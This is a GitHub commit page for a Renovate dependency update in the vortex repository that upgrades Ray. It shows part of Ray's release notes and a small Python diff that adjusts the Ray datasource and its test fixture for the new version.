unhealthy/healthy misreporting. ([#&#8203;60365](https://redirect.github.com/ray-project/ray/issues/60365), [#&#8203;61818](https://redirect.github.com/ray-project/ray/issues/61818), [#&#8203;62213](https://redirect.github.com/ray-project/ray/issues/62213)) - Fixed chained upstream actor-failure handling so request failures are attributed correctly and no longer hang when upstream deployments die mid-chain. ([#&#8203;61758](https://redirect.github.com/ray-project/ray/issues/61758), [#&#8203;62147](https://redirect.github.com/ray-project/ray/issues/62147)) - Fixed HTTP status classification for client disconnects after successful responses, improving accuracy of error-rate monitoring and alerting. ([#&#8203;61396](https://redirect.github.com/ray-project/ray/issues/61396)) ##### 📖 Documentation: - Added `AsyncInferenceAutoscalingPolicy` documentation and clarified Serve performance guidance for HAProxy and inter-deployment gRPC use cases. ([#&#8203;61086](https://redirect.github.com/ray-project/ray/issues/61086), [#&#8203;61386](https://redirect.github.com/ray-project/ray/issues/61386)) - Updated scheduling and configuration docs, including replica scheduling guidance and a catalog of Serve environment variables, so operators can tune deployments with less guesswork. ([#&#8203;60922](https://redirect.github.com/ray-project/ray/issues/60922), [#&#8203;60807](https://redirect.github.com/ray-project/ray/issues/60807)) - Clarified multiplexing and async behavior docs (including model pre-warming constraints and request-cancel semantics) to prevent common integration mistakes. ([#&#8203;61842](https://redirect.github.com/ray-project/ray/issues/61842), [#&#8203;62280](https://redirect.github.com/ray-project/ray/issues/62280)) ##### 🏗 Architecture refactoring: - Refactored deployment-state execution to skip unnecessary steady-state per-tick work, lowering control-loop churn and creating cleaner hooks for future scheduling logic. ([#&#8203;60840](https://redirect.github.com/ray-project/ray/issues/60840)) - Moved autoscaling metric aggregation into Cython-backed paths and added focused controller benchmarking, giving a stronger performance baseline for future Serve controller changes. ([#&#8203;58892](https://redirect.github.com/ray-project/ray/issues/58892), [#&#8203;61368](https://redirect.github.com/ray-project/ray/issues/61368)) - Simplified internal structure by migrating shared internals away from private modules and consolidating replica abstractions, reducing coupling and maintenance complexity. ([#&#8203;60849](https://redirect.github.com/ray-project/ray/issues/60849), [#&#8203;61363](https://redirect.github.com/ray-project/ray/issues/61363), [#&#8203;60198](https://redirect.github.com/ray-project/ray/issues/60198)) #### Ray Train ##### 🎉 New Features - Elastic training: core capability, user guide, release tests, multi-host TPU, telemetry ([#&#8203;60721](https://redirect.github.com/ray-project/ray/issues/60721), [#&#8203;61115](https://redirect.github.com/ray-project/ray/issues/61115), [#&#8203;61133](https://redirect.github.com/ray-project/ray/issues/61133), [#&#8203;61299](https://redirect.github.com/ray-project/ray/issues/61299), [#&#8203;61267](https://redirect.github.com/ray-project/ray/issues/61267)) - Add HF TRL (Transformer Reinforcement Learning) example ([#&#8203;61627](https://redirect.github.com/ray-project/ray/issues/61627)) - Add Tensor Parallel templates for DeepSpeed AutoTP and DTensor ([#&#8203;60160](https://redirect.github.com/ray-project/ray/issues/60160), [#&#8203;60158](https://redirect.github.com/ray-project/ray/issues/60158)) - Add `status` attribute to `ReportedCheckpoint` ([#&#8203;61684](https://redirect.github.com/ray-project/ray/issues/61684)) - Richer Train run metadata ([#&#8203;59186](https://redirect.github.com/ray-project/ray/issues/59186)) - Add timers for Train worker initialization ([#&#8203;60870](https://redirect.github.com/ray-project/ray/issues/60870)) - Configure `torchft` environment ([#&#8203;61156](https://redirect.github.com/ray-project/ray/issues/61156)) ##### 💫 Enhancements - Register training resources with `AutoscalingCoordinator` in `FixedScalingPolicy` ([#&#8203;61703](https://redirect.github.com/ray-project/ray/issues/61703)) - Decouple `datasets` field from `TrainRunContext` ([#&#8203;61953](https://redirect.github.com/ray-project/ray/issues/61953)) - Log warning for `checkpoint_upload_fn` when slow ([#&#8203;61720](https://redirect.github.com/ray-project/ray/issues/61720)) - Fix `StateManagerCallback` to accept datasets explicitly ([#&#8203;62042](https://redirect.github.com/ray-project/ray/issues/62042)) - Make train run abortable during `before_controller_shutdown` ([#&#8203;61816](https://redirect.github.com/ray-project/ray/issues/61816)) - Graceful abort catches all `RayActorError` ([#&#8203;61375](https://redirect.github.com/ray-project/ray/issues/61375)) - Refactor checkpoint and `sync_actor` to use `wait_with_logging` ([#&#8203;61063](https://redirect.github.com/ray-project/ray/issues/61063)) - Unwrap `UserExceptionWithTraceback` in `WorkerGroupError.worker_failures` ([#&#8203;61153](https://redirect.github.com/ray-project/ray/issues/61153)) ##### 🔨 Fixes - Fix v2 `PlacementGroupCleaner` zombie actor ([#&#8203;61756](https://redirect.github.com/ray-project/ray/issues/61756)) - Fix checkpoint paths for multinode run ([#&#8203;61471](https://redirect.github.com/ray-project/ray/issues/61471)) - Abort cancels validation tasks with deterministic resumption ([#&#8203;61510](https://redirect.github.com/ray-project/ray/issues/61510)) - Fix deepspeed finetune release test ([#&#8203;61266](https://redirect.github.com/ray-project/ray/issues/61266)) ##### 📖 Documentation - Add section on async validation with experiment tracking ([#&#8203;62104](https://redirect.github.com/ray-project/ray/issues/62104)) - Add section on when to use async validation ([#&#8203;61702](https://redirect.github.com/ray-project/ray/issues/61702)) #### Ray Tune ##### 💫 Enhancements - Remove deprecated `Logger` interface and `logger_creator` ([#&#8203;61181](https://redirect.github.com/ray-project/ray/issues/61181)) ##### 🔨 Fixes - Fix PBT trial order when `NaN` values are present ([#&#8203;57160](https://redirect.github.com/ray-project/ray/issues/57160)) #### Ray LLM ##### 🎉 New Features - Replace `PDProxyServer` with decode-as-orchestrator PD architecture ([#&#8203;62076](https://redirect.github.com/ray-project/ray/issues/62076)) - Introduce DP group fault tolerance for WideEP deployments ([#&#8203;61480](https://redirect.github.com/ray-project/ray/issues/61480)) - SGLang engine: streaming chat/completions, tokenize/detokenize, embeddings, multi-GPU TP/PP ([#&#8203;61236](https://redirect.github.com/ray-project/ray/issues/61236), [#&#8203;61446](https://redirect.github.com/ray-project/ray/issues/61446), [#&#8203;61159](https://redirect.github.com/ray-project/ray/issues/61159), [#&#8203;61201](https://redirect.github.com/ray-project/ray/issues/61201), [#&#8203;62221](https://redirect.github.com/ray-project/ray/issues/62221)) - Add `bundle_per_worker` config for simpler placement group setup ([#&#8203;59903](https://redirect.github.com/ray-project/ray/issues/59903)) - Separate Data and Serve LLM dashboards with improved panel visibility ([#&#8203;61037](https://redirect.github.com/ray-project/ray/issues/61037), [#&#8203;62069](https://redirect.github.com/ray-project/ray/issues/62069)) ##### 💫 Enhancements - Promote Data LLM and Serve LLM APIs to beta ([#&#8203;61249](https://redirect.github.com/ray-project/ray/issues/61249), [#&#8203;62054](https://redirect.github.com/ray-project/ray/issues/62054), [#&#8203;62223](https://redirect.github.com/ray-project/ray/issues/62223)) - Upgrade vLLM to 0.16.0, 0.17.0, and 0.18.0 ([#&#8203;61389](https://redirect.github.com/ray-project/ray/issues/61389), [#&#8203;61598](https://redirect.github.com/ray-project/ray/issues/61598), [#&#8203;61952](https://redirect.github.com/ray-project/ray/issues/61952)) - Upgrade NIXL to v1.0.0 and fix tensor transport issues ([#&#8203;61991](https://redirect.github.com/ray-project/ray/issues/61991)) - Unify duplicated `PlacementGroup` config schemes ([#&#8203;62241](https://redirect.github.com/ray-project/ray/issues/62241)) - Decouple Serve LLM ingress from vLLM protocol models ([#&#8203;61931](https://redirect.github.com/ray-project/ray/issues/61931)) - Set download task `num_cpus=0` to reduce contention on low-CPU machines ([#&#8203;61191](https://redirect.github.com/ray-project/ray/issues/61191)) - SGLangServer cleanup and replace `format_messages_to_prompt` with `_build_chat_messages` ([#&#8203;61117](https://redirect.github.com/ray-project/ray/issues/61117), [#&#8203;61372](https://redirect.github.com/ray-project/ray/issues/61372)) ##### 🔨 Fixes - Fix duplicate `data: [DONE]` in streaming SSE responses ([#&#8203;62246](https://redirect.github.com/ray-project/ray/issues/62246)) - Fix `enable_log_requests=False` not forwarded to vLLM `AsyncLLM` ([#&#8203;60824](https://redirect.github.com/ray-project/ray/issues/60824)) - Fix `OpenAiIngress` scale-to-zero when all models set `min_replicas=0` ([#&#8203;60836](https://redirect.github.com/ray-project/ray/issues/60836)) - Handle missing state attributes from vLLM's task-conditional `init_app_state` ([#&#8203;60812](https://redirect.github.com/ray-project/ray/issues/60812)) - Fix NIXL side channel host for cross-node P/D disaggregation ([#&#8203;60817](https://redirect.github.com/ray-project/ray/issues/60817)) - Fix `trust_remote_code` download ([#&#8203;60344](https://redirect.github.com/ray-project/ray/issues/60344)) - Avoid deprecated `TRANSFORMERS_CACHE`; treat HuggingFace config load failure as non-fatal ([#&#8203;60854](https://redirect.github.com/ray-project/ray/issues/60854)) - Fix sequential batch processing in SGLangServer ([#&#8203;61189](https://redirect.github.com/ray-project/ray/issues/61189)) ##### 📖 Documentation - Update data parallel attention documentation ([#&#8203;61706](https://redirect.github.com/ray-project/ray/issues/61706)) - Add custom tokenizer example ([#&#8203;61098](https://redirect.github.com/ray-project/ray/issues/61098)) - Add C/C++ binaries incompatibility workaround ([#&#8203;62110](https://redirect.github.com/ray-project/ray/issues/62110)) #### Ray RLlib ##### 💫 Enhancements - Connector/batching optimizations: ndarray fast paths, direct env step pipeline, batch reuse ([#&#8203;61320](https://redirect.github.com/ray-project/ray/issues/61320), [#&#8203;61255](https://redirect.github.com/ray-project/ray/issues/61255), [#&#8203;61256](https://redirect.github.com/ray-project/ray/issues/61256), [#&#8203;61259](https://redirect.github.com/ray-project/ray/issues/61259), [#&#8203;61144](https://redirect.github.com/ray-project/ray/issues/61144)) - Unify default encoders for all algorithms ([#&#8203;60302](https://redirect.github.com/ray-project/ray/issues/60302)) - Toggle eval/train mode in `TorchRLModule` forward passes ([#&#8203;61985](https://redirect.github.com/ray-project/ray/issues/61985)) - Clean up offline prelearner and unit testing ([#&#8203;60632](https://redirect.github.com/ray-project/ray/issues/60632)) - Remove duplicate assignments in `AlgorithmConfig` ([#&#8203;61233](https://redirect.github.com/ray-project/ray/issues/61233)) - Remove legacy RLlib release tests ([#&#8203;59288](https://redirect.github.com/ray-project/ray/issues/59288)) - Add APPO example with Footsies environment ([#&#8203;59006](https://redirect.github.com/ray-project/ray/issues/59006)) ##### 🔨 Fixes - Support custom eval functions returning zero `eval_results`, `env_steps`, or `agent_steps` ([#&#8203;61563](https://redirect.github.com/ray-project/ray/issues/61563)) - Fix `PrioritizedEpisodeReplayBuffer` bug ([#&#8203;60065](https://redirect.github.com/ray-project/ray/issues/60065)) - Fix missing `LayerNorm` in `RLModuleSpec` ([#&#8203;61025](https://redirect.github.com/ray-project/ray/issues/61025)) - Fix evaluation in parallel to training ([#&#8203;60777](https://redirect.github.com/ray-project/ray/issues/60777)) - Fix `MultiAgentEpisode.env_t_to_agent_t` ([#&#8203;60319](https://redirect.github.com/ray-project/ray/issues/60319)) - Fix default metric during eval ([#&#8203;61590](https://redirect.github.com/ray-project/ray/issues/61590)) - Fix incorrect log value of environment steps sampled/trained ([#&#8203;56599](https://redirect.github.com/ray-project/ray/issues/56599)) - Prevent `torch_learner.py` crash under parameter-freezing edge cases ([#&#8203;62158](https://redirect.github.com/ray-project/ray/issues/62158)) #### Ray Core ##### 🎉 New Features - Resource isolation: pressure-based memory monitor, time-based killing, cgroup constraints ([#&#8203;61361](https://redirect.github.com/ray-project/ray/issues/61361), [#&#8203;61323](https://redirect.github.com/ray-project/ray/issues/61323), [#&#8203;61097](https://redirect.github.com/ray-project/ray/issues/61097), [#&#8203;61210](https://redirect.github.com/ray-project/ray/issues/61210), [#&#8203;61297](https://redirect.github.com/ray-project/ray/issues/61297), [#&#8203;59365](https://redirect.github.com/ray-project/ray/issues/59365), [#&#8203;59368](https://redirect.github.com/ray-project/ray/issues/59368), [#&#8203;60752](https://redirect.github.com/ray-project/ray/issues/60752)) - IPPR: add `ResizeRayletResourceInstances` to GCS/Python client, schema/status models, KubeRay provider ([#&#8203;61654](https://redirect.github.com/ray-project/ray/issues/61654), [#&#8203;61666](https://redirect.github.com/ray-project/ray/issues/61666), [#&#8203;61803](https://redirect.github.com/ray-project/ray/issues/61803), [#&#8203;61814](https://redirect.github.com/ray-project/ray/issues/61814)) - Add `PlatformEvent` proto and placement group events in one-event framework ([#&#8203;61701](https://redirect.github.com/ray-project/ray/issues/61701), [#&#8203;60449](https://redirect.github.com/ray-project/ray/issues/60449)) - Add Nvidia B300 support ([#&#8203;60753](https://redirect.github.com/ray-project/ray/issues/60753)) - Add UV support for Ray Client mode ([#&#8203;60868](https://redirect.github.com/ray-project/ray/issues/60868)) - Add `Percentile` metric type backed by quadratic histogram ([#&#8203;61148](https://redirect.github.com/ray-project/ray/issues/61148)) - Expose `fallback_strategy` in `TaskInfoEntry` and `ActorTableData` ([#&#8203;60659](https://redirect.github.com/ray-project/ray/issues/60659)) - Add submission job proto changes ([#&#8203;60857](https://redirect.github.com/ray-project/ray/issues/60857)) - Add TPU util for ready multi-host slice count; simplify elastic TPU scaling ([#&#8203;61300](https://redirect.github.com/ray-project/ray/issues/61300), [#&#8203;62141](https://redirect.github.com/ray-project/ray/issues/62141)) - Introduce per-node level temp-dir ([#&#8203;60761](https://redirect.github.com/ray-project/ray/issues/60761)) - Make `ray.put()` generic: `put(value: R) -> ObjectRef[R]` ([#&#8203;60995](https://redirect.github.com/ray-project/ray/issues/60995)) - Add Python 3.14 support for recursion limit handling ([#&#8203;58459](https://redirect.github.com/ray-project/ray/issues/58459)) ##### 💫 Enhancements - Upgrade `cloudpickle` to 3.1.2, gRPC to v1.58.0, protobuf to 3.20.3 ([#&#8203;60317](https://redirect.github.com/ray-project/ray/issues/60317), [#&#8203;61499](https://redirect.github.com/ray-project/ray/issues/61499), [#&#8203;60736](https://redirect.github.com/ray-project/ray/issues/60736)) - Multiple gRPC connections for improved object transfer throughput, enabled by default ([#&#8203;61121](https://redirect.github.com/ray-project/ray/issues/61121), [#&#8203;61440](https://redirect.github.com/ray-project/ray/issues/61440)) - Improve `pg.ready()` performance via async GCS RPC; fix deadlocks ([#&#8203;60657](https://redirect.github.com/ray-project/ray/issues/60657), [#&#8203;62086](https://redirect.github.com/ray-project/ray/issues/62086)) - RDT: non-torch transfers, PyTorch storage caching, metadata caching, NIXL agent reuse ([#&#8203;61081](https://redirect.github.com/ray-project/ray/issues/61081), [#&#8203;60999](https://redirect.github.com/ray-project/ray/issues/60999), [#&#8203;60689](https://redirect.github.com/ray-project/ray/issues/60689), [#&#8203;60602](https://redirect.github.com/ray-project/ray/issues/60602)) - Cache `ActorHandle.__hash__` and fix `__eq__` correctness ([#&#8203;61638](https://redirect.github.com/ray-project/ray/issues/61638)) - Cache `find_gcs_addresses` ([#&#8203;61065](https://redirect.github.com/ray-project/ray/issues/61065)) - Optimize worker listener thread ([#&#8203;61353](https://redirect.github.com/ray-project/ray/issues/61353)) - Eliminate Python GCS client from state manager `get_all_node_info` ([#&#8203;61232](https://redirect.github.com/ray-project/ray/issues/61232)) - Loosen restriction on worker thread count ([#&#8203;62279](https://redirect.github.com/ray-project/ray/issues/62279)) - Sequence in-order actor tasks per concurrency group instead of globally ([#&#8203;61082](https://redirect.github.com/ray-project/ray/issues/61082)) - Prioritize killing workers that occupy large memory in OOM killer ([#&#8203;60330](https://redirect.github.com/ray-project/ray/issues/60330)) - Cap exponential backoff attempt number to prevent integer overflow ([#&#8203;61003](https://redirect.github.com/ray-project/ray/issues/61003)) - Replace deprecated threading APIs (`getName`/`setDaemon`) ([#&#8203;62153](https://redirect.github.com/ray-project/ray/issues/62153)) - Improve error handling for `@ray.remote`/`@ray.method` with `num_returns` ([#&#8203;59286](https://redirect.github.com/ray-project/ray/issues/59286)) - Convert `StopIteration` on non-generator functions to `RuntimeError` ([#&#8203;60521](https://redirect.github.com/ray-project/ray/issues/60521)) - Surface warnings for scheduling rate limits slowing task ramp-up ([#&#8203;61004](https://redirect.github.com/ray-project/ray/issues/61004)) - Periodically reload service account tokens; use `AuthenticationValidator` in sync server ([#&#8203;60778](https://redirect.github.com/ray-project/ray/issues/60778), [#&#8203;60779](https://redirect.github.com/ray-project/ray/issues/60779)) - Remove support for `local_mode` ([#&#8203;60647](https://redirect.github.com/ray-project/ray/issues/60647)) - Allow matching `worker_process_setup_hook` on re-entry ([#&#8203;61473](https://redirect.github.com/ray-project/ray/issues/61473)) - Reduce default event aggregator buffer size to avoid OOM ([#&#8203;60826](https://redirect.github.com/ray-project/ray/issues/60826)) - Suppress autoscaler action logs for read-only provider ([#&#8203;61732](https://redirect.github.com/ray-project/ray/issues/61732)) - Lazy subscription to node changes on non-driver workers ([#&#8203;61118](https://redirect.github.com/ray-project/ray/issues/61118)) - Tighten export symbol allowlists to prevent non-ray symbol leakage ([#&#8203;61298](https://redirect.github.com/ray-project/ray/issues/61298)) - Approximate USS from `memory_info` instead of calling `memory_full_info` ([#&#8203;60000](https://redirect.github.com/ray-project/ray/issues/60000)) - Dedicated IO context for `NodeManager` and `InternalKVManager` ([#&#8203;61002](https://redirect.github.com/ray-project/ray/issues/61002)) - Print gRPC peer address on GCS `HandleUnregisterNode`/`HandleDrainNode` ([#&#8203;62226](https://redirect.github.com/ray-project/ray/issues/62226), [#&#8203;62112](https://redirect.github.com/ray-project/ray/issues/62112)) ##### 🔨 Fixes - Fix task stuck when pop worker repeatedly fails ([#&#8203;60104](https://redirect.github.com/ray-project/ray/issues/60104)) - Fix `bool` env var parsing for `RAY_CGRAPH_overlap_gpu_communication` ([#&#8203;61421](https://redirect.github.com/ray-project/ray/issues/61421)) - Fix negative RUNNING task metric ([#&#8203;62070](https://redirect.github.com/ray-project/ray/issues/62070)) - Fix `OnNodeDead` to destroy all owned actors when owner node dies ([#&#8203;60669](https://redirect.github.com/ray-project/ray/issues/60669)) - Fix actor task queue blocked after cancelling head task ([#&#8203;60850](https://redirect.github.com/ray-project/ray/issues/60850)) - Fix `TASK_PROFILE_EVENT` aggregation for multiple phases ([#&#8203;61559](https://redirect.github.com/ray-project/ray/issues/61559)) - Fix double-counting in `WorkerPool::WarnAboutSize()` ([#&#8203;61246](https://redirect.github.com/ray-project/ray/issues/61246)) - Fix `TaskLifecycleEvent.node_id` using emitting node instead of executor ([#&#8203;61478](https://redirect.github.com/ray-project/ray/issues/61478)) - Fix `publisher_id` type mismatch in GCS pubsub ([#&#8203;61518](https://redirect.github.com/ray-project/ray/issues/61518)) - Fix `dataclass.asdict` with `None` in dashboard `list_jobs` API ([#&#8203;61033](https://redirect.github.com/ray-project/ray/issues/61033)) - Fix dashboard node head API dead node cache ([#&#8203;61185](https://redirect.github.com/ray-project/ray/issues/61185)) - Fix dashboard event agent for events without HTTP scheme ([#&#8203;60811](https://redirect.github.com/ray-project/ray/issues/60811)) - Fix Ray Actor typing for async methods ([#&#8203;60682](https://redirect.github.com/ray-project/ray/issues/60682)) - Fix autoscaler retry during k8s exceptions ([#&#8203;60658](https://redirect.github.com/ray-project/ray/issues/60658)) - Fix `ReadOnlyPro </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - "" - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Enabled. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about these updates again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/vortex-data/vortex). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNDEuMyIsInVwZGF0ZWRJblZlciI6IjQzLjE0MS4zIiwidGFyZ2V0QnJhbmNoIjoiZGV2ZWxvcCIsImxhYmVscyI6WyJjaGFuZ2Vsb2cvY2hvcmUiXX0=--> --------- Signed-off-by: Robert Kruszewski <github@robertk.io> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: Robert Kruszewski <github@robertk.io>
1 parent ea31cc2 commit 69b3fc6

3 files changed

Lines changed: 26 additions & 21 deletions

File tree

uv.lock

Lines changed: 15 additions & 12 deletions
Some generated files are not rendered by default. Learn more about customizing how changed files appear on GitHub.

vortex-python/python/vortex/ray/datasource.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -133,7 +133,7 @@ def _read_task(
133133
num_rows=num_rows,
134134
size_bytes=None,
135135
exec_stats=None,
136-
input_files=paths,
136+
input_files=tuple(paths),
137137
)
138138

139139
def read() -> Iterable[pandas.DataFrame]:

vortex-python/test/test_datasource.py

Lines changed: 10 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -14,13 +14,15 @@
1414

1515
@pytest.fixture(scope="module")
1616
def ray_init():
17-
# https://github.com/ray-project/ray/issues/53848#issuecomment-3056271943
18-
ray.init( # pyright: ignore[reportUnknownMemberType]
19-
runtime_env={
20-
"working_dir": None,
21-
"excludes": [".git", ".venv"],
22-
}
23-
)
17+
# Ray's uv_runtime_env_hook would auto-upload the working directory to
18+
# workers, but vortex-python's compiled _lib extension exceeds Ray's
19+
# 512 MiB upload limit. Disable the hook for these local-mode tests.
20+
# (Ray 2.55 added a string-type validation that broke the previous
21+
# `working_dir: None` workaround from ray-project/ray#53848.)
22+
import ray._private.ray_constants as ray_constants
23+
24+
ray_constants.RAY_ENABLE_UV_RUN_RUNTIME_ENV = False
25+
_ = ray.init() # pyright: ignore[reportUnknownMemberType]
2426
yield None
2527
ray.shutdown() # pyright: ignore[reportUnknownMemberType]
2628

@@ -53,7 +55,7 @@ def test_vortex_datasource(ray_init, tmpdir_factory): # pyright: ignore[reportU
5355
# Without an explicit sort, Ray may reorder rows *even within a single record batch*.
5456
ds = ds.sort("index")
5557

56-
tbl = pa.concat_tables(pa.Table.from_pydict(x) for x in ds.iter_batches()) # pyright: ignore[reportArgumentType]
58+
tbl = pa.concat_tables(pa.Table.from_pydict(x) for x in ds.iter_batches()) # pyright: ignore[reportArgumentType, reportUnknownMemberType, reportUnknownVariableType]
5759
expected = pa.Table.from_pylist([record(x) for x in range(0, 10)], schema=tbl.schema)
5860

5961
assert tbl == expected

0 commit comments

Comments
 (0)